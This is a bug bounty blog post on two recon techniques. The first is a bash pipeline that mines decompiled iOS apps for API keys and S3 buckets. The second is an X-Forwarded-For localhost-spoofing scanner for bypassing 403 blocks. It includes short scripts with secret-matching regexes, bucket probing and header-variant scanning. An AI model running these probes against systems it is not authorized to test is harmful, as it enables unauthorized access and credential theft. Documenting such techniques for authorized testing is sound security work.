One of the essential qualities of a bug hunter is the ability to find exploitable vulnerabilities that others haven’t found.

The ability to find bugs not discovered by others comes not from deep technical knowledge, but from creativity and innovation.

So how do you get an edge over others? Find the path least trodden.

How do you find the path least trodden? Be creative: come up with new ways to build footprint/reconnaissance on a target.

In my case, I decided to apply this concept to an area of bug bounties which usually doesn’t get as much attention as web applications: iOS apps.

I also chose iOS apps because they are closed source and not straightforward to hack. I figured that because hacking iOS apps has a price barrier to entry, as well as messy configuration requirements, I would be working on targets which other researchers would be less likely to see. It would therefore be a path least trodden.

So I set out on the task: found an old iPhone, went out and purchased a MacBook, and used it to jailbreak the iPhone. Then, in order to be able to download and decrypt in-scope bug bounty apps, I had to configure a few tools.

After some tinkering, I built an end-to-end workflow, called iGold, which enabled me to hack in-scope iOS apps at scale with little manual involvement.

I wrote the workflow in bash, and it enabled me to perform two key functions:

Use case 1 (on-demand): Whenever I see a new bounty program, I can download the iOS app onto my phone, which triggers a process to automatically download and decompile the app, test API key access to databases, etc.

Use case 2 (bulk): Download hundreds of apps from various bounty platforms at once. As they are downloaded, they are automatically decompiled and tested, en masse.

The script essentially decrypts iOS applications, downloads them, decompiles them, converts plist files, performs some class dumping, runs strings on the binaries, and then starts grepping this data for specific targets like API keys, URLs, tokens, and all manner of secrets using regex. The script also tests some API keys.
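To make the grepping stage concrete, here is a minimal bash sketch of that step. This is a hypothetical illustration, not the actual iGold code: the function name, the assumption that decompiled output sits in a directory, and the regex patterns are all mine, and real secret-hunting regexes are far more extensive.

```shell
#!/usr/bin/env bash
# Hypothetical sketch of the secret-grepping stage of a pipeline like iGold.
# Assumes the app has already been decrypted, decompiled and string-dumped
# into a directory; the patterns below are illustrative only.
scan_secrets() {
  local dir="$1"
  grep -rEoh 'AKIA[0-9A-Z]{16}' "$dir" 2>/dev/null || true          # AWS access key IDs
  grep -rEoh 'AIza[0-9A-Za-z_-]{35}' "$dir" 2>/dev/null || true     # Google API keys
  grep -rEoh 'https?://[A-Za-z0-9./_?=&-]+' "$dir" 2>/dev/null | sort -u || true  # hard-coded URLs
}
```

In a full workflow, a stage like this would run automatically after strings extraction, class dumping and plist conversion, feeding candidate hits into key-testing logic.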

I compared my script process with some common tools like MobSF, and found that in some cases I was looking for things that MobSF was not searching for.

Because I was able to perform this recon at scale, I was able to discover a number of interesting things – which I’ll break into two categories.

  1. Secrets (as expected) – found a number of API keys which had not been discovered by others.
  2. Valuable recon about organisations which is otherwise hard/impossible to get.

I found point 2 to be of more value.

By way of example, I discovered an iOS app binary which contained an S3 bucket address. I looked the address up and found the bucket was public. I then identified a very suspicious-looking file in this public bucket, but alas, the file was blocked/secured. I knew they had a number of private buckets, so I scanned the same file name against those private buckets and got a hit – it downloaded.
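The probing step here is simple to sketch. The helper below is a hypothetical illustration (the bucket and object names in the usage comments are invented); it just checks what HTTP status code an S3 object returns to an unauthenticated request.

```shell
# Hypothetical sketch: build an S3 object URL and check whether the object
# is fetchable without credentials (200 = downloads, 403 = blocked).
s3_url() {
  printf 'https://%s.s3.amazonaws.com/%s' "$1" "$2"
}

check_object() {
  # -o /dev/null -w '%{http_code}' discards the body and prints only the status
  curl -s -o /dev/null -w '%{http_code}' "$(s3_url "$1" "$2")"
}

# Usage (hypothetical names):
#   check_object acme-public-assets  backup.tar.gz
#   check_object acme-private-assets backup.tar.gz
```

Scanning a file name seen in one bucket against an organisation's other buckets is then just a loop over `check_object`.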

On another occasion, I found an S3 bucket address in a binary which contained a file which, once downloaded and decompressed, contained the administrative credentials to their entire global AWS tenancy.

Often, less attention is given to securing assets that are harder to find – so find the path least trodden!

Bypassing 403

A few weeks ago I came across this cool “accidental” exploit vector, documented about 8 years ago by IRCmaxwell, which describes a way to trick servers (behind a reverse proxy or load balancer) into thinking an HTTP request which is ordinarily unauthorised is actually authorised.

I read the blog post while doing some research into the X-Forwarded-For HTTP request header and immediately identified this “accidental exploit” as a really cool use-case to apply to bug bounty targets.

To explain this exploit we need to first understand the purpose of the X-Forwarded-For request header.

The X-Forwarded-For (XFF) header is a de-facto standard header for identifying the originating IP address of a client connecting to a web server through an HTTP proxy or a load balancer. When traffic is intercepted between clients and servers, server access logs contain the IP address of the proxy or load balancer only. To see the original IP address of the client, the X-Forwarded-For request header is used.

https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Forwarded-For
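On the wire it is just another request header; each proxy hop typically appends the client IP it saw, so the value can be a comma-separated list. A representative request (using documentation example addresses) looks like:

```http
GET /resource HTTP/1.1
Host: example.com
X-Forwarded-For: 203.0.113.7, 198.51.100.2
```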

This header is used and implemented in a variety of ways and, because of this, it can also be exploited in a variety of ways. Researchers often use it to inject SQL payloads, enumerate proxies, spoof client IPs, attempt SSRF, and for many other interesting use-cases which I’ll cover later.

However, the use-case that really got my attention was a variation of IP spoofing which causes the target web server to reveal information that it shouldn’t. I like to find vulnerabilities that most scanners aren’t configured to find, and I think this is another one of those cases.

So IRCmaxwell experienced a situation where he unintentionally configured all of his outgoing HTTP requests to include the X-Forwarded-For header set to an IP address of 127.0.0.1 (the local host) – you can read his blog to find out how and why.

As a result, he discovered that StackOverflow was revealing parts of an administrative console to him that should not have been available for public viewing or access.

What was happening is that once the StackOverflow server received this request, it interpreted “X-Forwarded-For: 127.0.0.1” to mean that the web server itself had initiated the request, and that by implication, the requestor was authorised to see all the content available at that endpoint. IRCmaxwell was effectively masquerading as the web server itself, as far as the web server was concerned.

I thought this was a pretty cool vulnerability, and so thought about how I could apply it to bug bounty targets.

So I wrote a tool which sends numerous requests to a target address with different localhost variations of the XFF header, to accommodate cases where a WAF blocks requests based on localhost signatures.

The tool uses heuristics to learn variations in the HTTP response that could be indicative of additional sensitive information being disclosed.
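The core of such a scanner is small; below is a hypothetical bash sketch of the idea. The variant list and the heuristic (comparing status code and body size against an unmodified baseline) are my assumptions for illustration, not the actual tool.

```shell
# Hypothetical sketch of an XFF-variation scanner: fetch the target once with
# no spoofed header as a baseline, then once per localhost-style variant, and
# flag any response that differs - a crude heuristic for extra disclosure.
xff_variants() {
  printf '%s\n' '127.0.0.1' '127.0.0.1:80' 'localhost' '::1' '127.1' '0.0.0.0'
}

scan_target() {
  local url="$1" baseline resp v
  baseline=$(curl -s -o /dev/null -w '%{http_code} %{size_download}' "$url")
  while read -r v; do
    resp=$(curl -s -o /dev/null -w '%{http_code} %{size_download}' \
           -H "X-Forwarded-For: $v" "$url")
    if [ "$resp" != "$baseline" ]; then
      echo "LEAD: $url XFF=$v -> $resp (baseline: $baseline)"
    fi
  done < <(xff_variants)
}
```

A real tool would also diff response bodies and account for dynamic content, but even this crude status-and-size comparison surfaces leads worth manual review.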

As I developed this tool and scanned across hundreds of bug bounty targets I began to discover some interesting nuances. Web applications would handle and respond to XFF input very differently, resulting in some unexpected bug bounty leads.

However, the biggest win came early in the scanning, when the tool discovered an admin console on a subdomain that was blocked to the public (response code 403) until it was sent an HTTP request with an XFF header set to 127.0.0.1:80, at which point the admin console became accessible.

After writing up the report – demonstrating the impact – it occurred to me that the same issue might occur on other subdomains of the parent domains.

After some searching I realised that not one subdomain, but two, no wait… over 800 subdomains of this particular organisation were impacted by the same issue. Each of these subdomains contained web applications, APIs or other services which were normally blocked from public access, but were bypassable using this technique!